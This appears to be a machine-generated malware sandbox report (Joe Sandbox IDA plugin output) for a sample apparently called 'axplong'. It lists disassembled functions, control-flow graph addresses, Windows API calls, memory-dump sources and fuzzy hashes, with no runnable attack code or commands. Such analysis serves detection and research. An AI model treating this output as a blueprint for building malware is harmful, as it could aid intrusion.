                                                                                                                                                                  Function 00C27D00 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 392COMMON
                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                  • Executed
                                                                                                                                                                  • Not Executed
                                                                                                                                                                  control_flow_graph 3069 c27d00-c27d82 call c54020 3073 c27d88-c27db0 call c37870 call c25b20 3069->3073 3074 c2827e-c2829b call c3cf21 3069->3074 3081 c27db2 3073->3081 3082 c27db4-c27dd6 call c37870 call c25b20 3073->3082 3081->3082 3087 c27dda-c27df3 3082->3087 3088 c27dd8 3082->3088 3091 c27e24-c27e4f 3087->3091 3092 c27df5-c27e04 3087->3092 3088->3087 3095 c27e80-c27ea1 3091->3095 3096 c27e51-c27e60 3091->3096 3093 c27e06-c27e14 3092->3093 3094 c27e1a-c27e21 call c3d593 3092->3094 3093->3094 3097 c2829c call c56b9a 3093->3097 3094->3091 3101 c27ea3-c27ea5 GetNativeSystemInfo 3095->3101 3102 c27ea7-c27eac 3095->3102 3099 c27e62-c27e70 3096->3099 3100 c27e76-c27e7d call c3d593 3096->3100 3110 c282a1-c282a6 call c56b9a 3097->3110 3099->3097 3099->3100 3100->3095 3103 c27ead-c27eb6 3101->3103 3102->3103 3108 c27ed4-c27ed7 3103->3108 3109 c27eb8-c27ebf 3103->3109 3114 c2821f-c28222 3108->3114 3115 c27edd-c27ee6 3108->3115 3112 c27ec5-c27ecf 3109->3112 3113 c28279 3109->3113 3117 c28274 3112->3117 3113->3074 3114->3113 3120 c28224-c2822d 3114->3120 3118 c27ee8-c27ef4 3115->3118 3119 c27ef9-c27efc 3115->3119 3117->3113 3118->3117 3122 c27f02-c27f09 3119->3122 3123 c281fc-c281fe 3119->3123 3124 c28254-c28257 3120->3124 3125 c2822f-c28233 3120->3125 3128 c27fe9-c281e5 call c37870 call c25b20 call c37870 call c25b20 call c25c60 call c37870 call c25b20 call c25640 call c37870 call c25b20 call c37870 call c25b20 call c25c60 call c37870 call c25b20 call c25640 call c37870 call c25b20 call c37870 call c25b20 call c25c60 call c37870 call c25b20 call c25640 3122->3128 3129 c27f0f-c27f6b call c37870 call c25b20 call c37870 call c25b20 call c25c60 3122->3129 3126 c28200-c2820a 3123->3126 3127 c2820c-c2820f 3123->3127 3132 c28265-c28271 3124->3132 3133 c28259-c28263 3124->3133 3130 c28235-c2823a 3125->3130 3131 c28248-c28252 3125->3131 3126->3117 3127->3113 3135 c28211-c2821d 3127->3135 3167 c281eb-c281f4 3128->3167 3154 c27f70-c27f77 3129->3154 3130->3131 3137 c2823c-c28246 3130->3137 3131->3113 3132->3117 3133->3113 3135->3117 3137->3113 3156 c27f7b-c27f9b call c58a81 3154->3156 3157 c27f79 3154->3157 3163 c27fd2-c27fd4 3156->3163 3164 c27f9d-c27fac 3156->3164 3157->3156 3166 c27fda-c27fe4 3163->3166 3163->3167 3169 c27fc2-c27fcf call c3d593 3164->3169 3170 c27fae-c27fbc 3164->3170 3166->3167 3167->3114 3172 c281f6 3167->3172 3169->3163 3170->3110 3170->3169 3172->3123
                                                                                                                                                                  APIs
                                                                                                                                                                  • GetNativeSystemInfo.KERNEL32(?), ref: 00C27EA3
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000006.00000002.3020960898.0000000000C21000.00000040.00000001.01000000.00000007.sdmp, Offset: 00C20000, based on PE: true
                                                                                                                                                                  • Associated: 00000006.00000002.3020888283.0000000000C20000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.3020960898.0000000000C82000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.3021161476.0000000000C89000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.3021229189.0000000000C8B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.3021229189.0000000000E11000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.3021229189.0000000000EE8000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.3021229189.0000000000F14000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.3021229189.0000000000F1B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.3021229189.0000000000F2A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.3022146158.0000000000F2B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.3022565114.00000000010BE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.3022634311.00000000010BF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.3022711586.00000000010C0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.3022802243.00000000010C1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_6_2_c20000_axplong.jbxd
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: InfoNativeSystem
                                                                                                                                                                  • String ID: JmpxQb==$JmpxRL==$JmpyPb==
                                                                                                                                                                  • API String ID: 1721193555-2057465332
                                                                                                                                                                  • Opcode ID: a774452a94ec166da818ced94e58d91b346068a8394f7944d3280df6cb0fc8f7
                                                                                                                                                                  • Instruction ID: 81911790aea70a58bc3919e1fe33e7d781b816e9271e3d2cdb2d180d3dc2f4bc
                                                                                                                                                                  • Opcode Fuzzy Hash: a774452a94ec166da818ced94e58d91b346068a8394f7944d3280df6cb0fc8f7
                                                                                                                                                                  • Instruction Fuzzy Hash: 38D12970E00664DBDF24BB28EC4A3AD7771AB45324F50429CE415AB7D2DB358F8497D2
                                                                                                                                                                  Function 00C27560 Relevance: 4.7, APIs: 3, Instructions: 158sleepthreadCOMMON
                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                  • Executed
                                                                                                                                                                  • Not Executed
                                                                                                                                                                  control_flow_graph 3292 c27560-c275b1 Sleep 3293 c275b3-c275c7 call c3d041 3292->3293 3294 c27631-c276a7 call c37f30 * 3 CreateThread Sleep 3292->3294 3293->3294 3300 c275c9-c2762e call c3d57e call c3cff7 3293->3300 3308 c276d5-c276ed 3294->3308 3309 c276a9-c276b5 3294->3309 3300->3294 3312 c27717-c2772f 3308->3312 3313 c276ef-c276fb 3308->3313 3310 c276b7-c276c5 3309->3310 3311 c276cb-c276d2 call c3d593 3309->3311 3310->3311 3316 c2776b-c27770 call c56b9a 3310->3316 3311->3308 3314 c27731-c2773d 3312->3314 3315 c27759-c2776a 3312->3315 3318 c2770d-c27714 call c3d593 3313->3318 3319 c276fd-c2770b 3313->3319 3321 c2774f-c27756 call c3d593 3314->3321 3322 c2773f-c2774d 3314->3322 3318->3312 3319->3316 3319->3318 3321->3315 3322->3316 3322->3321
                                                                                                                                                                  APIs
                                                                                                                                                                  • Sleep.KERNEL32(00000064,1A1F2CD4,?,00000000,00C68FB8,000000FF), ref: 00C2759C
                                                                                                                                                                  • CreateThread.KERNEL32(00000000,00000000,00C27400,00C88608,00000000,00000000,?,?,?,?,?,?,?,?), ref: 00C2768E
                                                                                                                                                                  • Sleep.KERNEL32(000001F4,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00C27699
                                                                                                                                                                    • Part of subcall function 00C3CFF7: RtlWakeAllConditionVariable.NTDLL ref: 00C3D0AB
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000006.00000002.3020960898.0000000000C21000.00000040.00000001.01000000.00000007.sdmp, Offset: 00C20000, based on PE: true
                                                                                                                                                                  • Associated: 00000006.00000002.3020888283.0000000000C20000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.3020960898.0000000000C82000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.3021161476.0000000000C89000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.3021229189.0000000000C8B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.3021229189.0000000000E11000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.3021229189.0000000000EE8000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.3021229189.0000000000F14000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.3021229189.0000000000F1B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.3021229189.0000000000F2A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.3022146158.0000000000F2B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.3022565114.00000000010BE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.3022634311.00000000010BF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.3022711586.00000000010C0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.3022802243.00000000010C1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_6_2_c20000_axplong.jbxd
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Sleep$ConditionCreateThreadVariableWake
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 79123409-0
                                                                                                                                                                  • Opcode ID: 0431d81f2d5621dbb4fbc249a1c2dde761ac164f423e30b4b02a831f13bc333e
                                                                                                                                                                  • Instruction ID: 0d89c9d91eb55a177cf43abcaf09ef6b4f4e8d41b90bd4812d3efeafb8314a93
                                                                                                                                                                  • Opcode Fuzzy Hash: 0431d81f2d5621dbb4fbc249a1c2dde761ac164f423e30b4b02a831f13bc333e
                                                                                                                                                                  • Instruction Fuzzy Hash: 135127B0214208DBEB14DF28EDC5B8D3BA1EB48704F904229F8119BBD1DB79D9848F99
                                                                                                                                                                  Function 00C56E01 Relevance: 4.6, APIs: 3, Instructions: 145COMMON
                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                  • Executed
                                                                                                                                                                  • Not Executed
                                                                                                                                                                  control_flow_graph 3329 c56e01-c56e36 GetFileType 3330 c56e3c-c56e47 3329->3330 3331 c56eee-c56ef1 3329->3331 3334 c56e69-c56e85 call c54020 GetFileInformationByHandle 3330->3334 3335 c56e49-c56e5a call c57177 3330->3335 3332 c56ef3-c56ef6 3331->3332 3333 c56f1a-c56f42 3331->3333 3332->3333 3336 c56ef8-c56efa 3332->3336 3338 c56f44-c56f57 3333->3338 3339 c56f5f-c56f61 3333->3339 3343 c56f0b-c56f18 call c5740d 3334->3343 3348 c56e8b-c56ecd call c570c9 call c56f71 * 3 3334->3348 3350 c56f07-c56f09 3335->3350 3351 c56e60-c56e67 3335->3351 3342 c56efc-c56f01 call c57443 3336->3342 3336->3343 3338->3339 3356 c56f59-c56f5c 3338->3356 3341 c56f62-c56f70 call c3cf21 3339->3341 3342->3350 3343->3350 3365 c56ed2-c56eea call c57096 3348->3365 3350->3341 3351->3334 3356->3339 3365->3339 3368 c56eec 3365->3368 3368->3350
                                                                                                                                                                  APIs
                                                                                                                                                                  • GetFileType.KERNEL32(?,?,00000000,00000000), ref: 00C56E23
                                                                                                                                                                  • GetFileInformationByHandle.KERNEL32(?,?), ref: 00C56E7D
                                                                                                                                                                  • __dosmaperr.LIBCMT ref: 00C56F12
                                                                                                                                                                    • Part of subcall function 00C57177: __dosmaperr.LIBCMT ref: 00C571AC
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000006.00000002.3020960898.0000000000C21000.00000040.00000001.01000000.00000007.sdmp, Offset: 00C20000, based on PE: true
                                                                                                                                                                  • Associated: 00000006.00000002.3020888283.0000000000C20000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.3020960898.0000000000C82000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.3021161476.0000000000C89000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.3021229189.0000000000C8B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.3021229189.0000000000E11000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.3021229189.0000000000EE8000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.3021229189.0000000000F14000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.3021229189.0000000000F1B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.3021229189.0000000000F2A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.3022146158.0000000000F2B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.3022565114.00000000010BE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.3022634311.00000000010BF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.3022711586.00000000010C0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.3022802243.00000000010C1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_6_2_c20000_axplong.jbxd
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: File__dosmaperr$HandleInformationType
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 2531987475-0
                                                                                                                                                                  • Opcode ID: d4802f6b50d684bd83607bf84b4c9922aee3d9958d4a8a6baed0958cc6ebc19e
                                                                                                                                                                  • Instruction ID: fef3d51509343c5b606ccea2bb7894d0d1a51c92e03fe7d7cc8fd138c515a9bb
                                                                                                                                                                  • Opcode Fuzzy Hash: d4802f6b50d684bd83607bf84b4c9922aee3d9958d4a8a6baed0958cc6ebc19e
                                                                                                                                                                  • Instruction Fuzzy Hash: 10416079900304AFDB24DFB5E845AAFB7F9EF88301B50451DF856D3251EB30A988DB24
                                                                                                                                                                  Function 00C56C99 Relevance: 3.1, APIs: 2, Instructions: 89COMMON
                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                  • Executed
                                                                                                                                                                  • Not Executed
                                                                                                                                                                  control_flow_graph 3406 c56c99-c56ca5 3407 c56cc4-c56ce8 call c54020 3406->3407 3408 c56ca7-c56cc3 call c57430 call c57443 call c56b8a 3406->3408 3413 c56d06-c56d28 CreateFileW 3407->3413 3414 c56cea-c56d04 call c57430 call c57443 call c56b8a 3407->3414 3417 c56d38-c56d3f call c56d77 3413->3417 3418 c56d2a-c56d2e call c56e01 3413->3418 3438 c56d72-c56d76 3414->3438 3428 c56d40-c56d42 3417->3428 3427 c56d33-c56d36 3418->3427 3427->3428 3430 c56d64-c56d67 3428->3430 3431 c56d44-c56d61 call c54020 3428->3431 3434 c56d70 3430->3434 3435 c56d69-c56d6f CloseHandle 3430->3435 3431->3430 3434->3438 3435->3434
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000006.00000002.3020960898.0000000000C21000.00000040.00000001.01000000.00000007.sdmp, Offset: 00C20000, based on PE: true
                                                                                                                                                                  • Associated: 00000006.00000002.3020888283.0000000000C20000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.3020960898.0000000000C82000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.3021161476.0000000000C89000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.3021229189.0000000000C8B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.3021229189.0000000000E11000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.3021229189.0000000000EE8000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.3021229189.0000000000F14000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.3021229189.0000000000F1B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.3021229189.0000000000F2A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.3022146158.0000000000F2B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.3022565114.00000000010BE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.3022634311.00000000010BF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.3022711586.00000000010C0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.3022802243.00000000010C1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_6_2_c20000_axplong.jbxd
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: 3e5ba1ce27ce486d1cdcd37ab0ad8dbe227a6b794cd70ec3ac7046fa9fcce5bc
                                                                                                                                                                  • Instruction ID: 81592f2b7b89a07f14c3125b055438720f9171e9bb8c2bacb220a7345ff7800b
                                                                                                                                                                  • Opcode Fuzzy Hash: 3e5ba1ce27ce486d1cdcd37ab0ad8dbe227a6b794cd70ec3ac7046fa9fcce5bc
                                                                                                                                                                  • Instruction Fuzzy Hash: A6212876A052087AEB117B64AC42BAF37399F4133AF600710FD343B1D1DB705E89A6A9
                                                                                                                                                                  Function 00C282B0 Relevance: 1.7, APIs: 1, Instructions: 159COMMON
                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                  • Executed
                                                                                                                                                                  • Not Executed
                                                                                                                                                                  control_flow_graph 3497 c282b0-c28331 call c54020 3501 c28333-c28338 3497->3501 3502 c2833d-c28365 call c37870 call c25b20 3497->3502 3503 c2847f-c2849b call c3cf21 3501->3503 3510 c28367 3502->3510 3511 c28369-c2838b call c37870 call c25b20 3502->3511 3510->3511 3516 c2838f-c283a8 3511->3516 3517 c2838d 3511->3517 3520 c283aa-c283b9 3516->3520 3521 c283d9-c28404 3516->3521 3517->3516 3522 c283bb-c283c9 3520->3522 3523 c283cf-c283d6 call c3d593 3520->3523 3524 c28431-c28452 3521->3524 3525 c28406-c28415 3521->3525 3522->3523 3526 c2849c-c284a1 call c56b9a 3522->3526 3523->3521 3530 c28454-c28456 GetNativeSystemInfo 3524->3530 3531 c28458-c2845d 3524->3531 3528 c28427-c2842e call c3d593 3525->3528 3529 c28417-c28425 3525->3529 3528->3524 3529->3526 3529->3528 3532 c2845e-c28465 3530->3532 3531->3532 3532->3503 3537 c28467-c2846f 3532->3537 3540 c28471-c28476 3537->3540 3541 c28478-c2847b 3537->3541 3540->3503 3541->3503 3542 c2847d 3541->3542 3542->3503
                                                                                                                                                                  APIs
                                                                                                                                                                  • GetNativeSystemInfo.KERNEL32(?), ref: 00C28454
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000006.00000002.3020960898.0000000000C21000.00000040.00000001.01000000.00000007.sdmp, Offset: 00C20000, based on PE: true
                                                                                                                                                                  • Associated: 00000006.00000002.3020888283.0000000000C20000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.3020960898.0000000000C82000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.3021161476.0000000000C89000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.3021229189.0000000000C8B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.3021229189.0000000000E11000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.3021229189.0000000000EE8000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.3021229189.0000000000F14000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.3021229189.0000000000F1B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.3021229189.0000000000F2A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.3022146158.0000000000F2B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.3022565114.00000000010BE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.3022634311.00000000010BF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.3022711586.00000000010C0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.3022802243.00000000010C1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_6_2_c20000_axplong.jbxd
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: InfoNativeSystem
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 1721193555-0
                                                                                                                                                                  • Opcode ID: a886f1702944049afa6e871b3ca0b786a464bc1f0a913f8537e2025503c80a88
                                                                                                                                                                  • Instruction ID: 47c1fae07e53ae93bd1511607b4d4a94a58eb29e607bc457b5df35f998d678e1
                                                                                                                                                                  • Opcode Fuzzy Hash: a886f1702944049afa6e871b3ca0b786a464bc1f0a913f8537e2025503c80a88
                                                                                                                                                                  • Instruction Fuzzy Hash: 6C514970D012289BEB24FB28EC457EEB775DB45314F5042A8E809A76D1EF349E888B95
                                                                                                                                                                  Function 00C56F71 Relevance: 1.6, APIs: 1, Instructions: 56timeCOMMON
                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                  • Executed
                                                                                                                                                                  • Not Executed
                                                                                                                                                                  control_flow_graph 3543 c56f71-c56f87 3544 c56f97-c56fa7 3543->3544 3545 c56f89-c56f8d 3543->3545 3550 c56fe7-c56fea 3544->3550 3551 c56fa9-c56fbb SystemTimeToTzSpecificLocalTime 3544->3551 3545->3544 3546 c56f8f-c56f95 3545->3546 3547 c56fec-c56ff7 call c3cf21 3546->3547 3550->3547 3551->3550 3553 c56fbd-c56fdd call c56ff8 3551->3553 3555 c56fe2-c56fe5 3553->3555 3555->3547
                                                                                                                                                                  APIs
                                                                                                                                                                  • SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?), ref: 00C56FB3
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000006.00000002.3020960898.0000000000C21000.00000040.00000001.01000000.00000007.sdmp, Offset: 00C20000, based on PE: true
                                                                                                                                                                  • Associated: 00000006.00000002.3020888283.0000000000C20000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.3020960898.0000000000C82000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.3021161476.0000000000C89000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.3021229189.0000000000C8B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.3021229189.0000000000E11000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.3021229189.0000000000EE8000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.3021229189.0000000000F14000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.3021229189.0000000000F1B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.3021229189.0000000000F2A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.3022146158.0000000000F2B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.3022565114.00000000010BE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.3022634311.00000000010BF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.3022711586.00000000010C0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.3022802243.00000000010C1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_6_2_c20000_axplong.jbxd
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Time$LocalSpecificSystem
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 2574697306-0
                                                                                                                                                                  • Opcode ID: 134f5b1e82656d721bfe36656746ce33f8b47493f4a805e7a1e543bd3adc92dc
                                                                                                                                                                  • Instruction ID: 5789455f9eca52736e642bc9ebe90b80fad4d75bb354b281fb0d8d1b0d87b6b2
                                                                                                                                                                  • Opcode Fuzzy Hash: 134f5b1e82656d721bfe36656746ce33f8b47493f4a805e7a1e543bd3adc92dc
                                                                                                                                                                  • Instruction Fuzzy Hash: 9111D07690010CABDB10DED5D944EDFB7BC9B08315F505266E911E7180D770EF488B65
                                                                                                                                                                  Function 00C5AF0B Relevance: 1.5, APIs: 1, Instructions: 33memoryCOMMONLIBRARYCODE
                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                  • Executed
                                                                                                                                                                  • Not Executed
                                                                                                                                                                  control_flow_graph 3556 c5af0b-c5af17 3557 c5af49-c5af54 call c57443 3556->3557 3558 c5af19-c5af1b 3556->3558 3565 c5af56-c5af58 3557->3565 3560 c5af34-c5af45 RtlAllocateHeap 3558->3560 3561 c5af1d-c5af1e 3558->3561 3562 c5af47 3560->3562 3563 c5af20-c5af27 call c59c81 3560->3563 3561->3560 3562->3565 3563->3557 3568 c5af29-c5af32 call c58cf9 3563->3568 3568->3557 3568->3560
                                                                                                                                                                  APIs
                                                                                                                                                                  • RtlAllocateHeap.NTDLL(00000000,1A1F2CD4,?,?,00C3D32C,1A1F2CD4,?,00C378FB,?,?,?,?,?,?,00C27435,?), ref: 00C5AF3D
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000006.00000002.3020960898.0000000000C21000.00000040.00000001.01000000.00000007.sdmp, Offset: 00C20000, based on PE: true
                                                                                                                                                                  • Associated: 00000006.00000002.3020888283.0000000000C20000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.3020960898.0000000000C82000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.3021161476.0000000000C89000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.3021229189.0000000000C8B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.3021229189.0000000000E11000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.3021229189.0000000000EE8000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.3021229189.0000000000F14000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.3021229189.0000000000F1B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.3021229189.0000000000F2A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.3022146158.0000000000F2B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.3022565114.00000000010BE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                  • Associated: 00000006.00000002.3022634311.00000000010BF000.00000080.00000001.01000000.00000007.sdmpDownload File
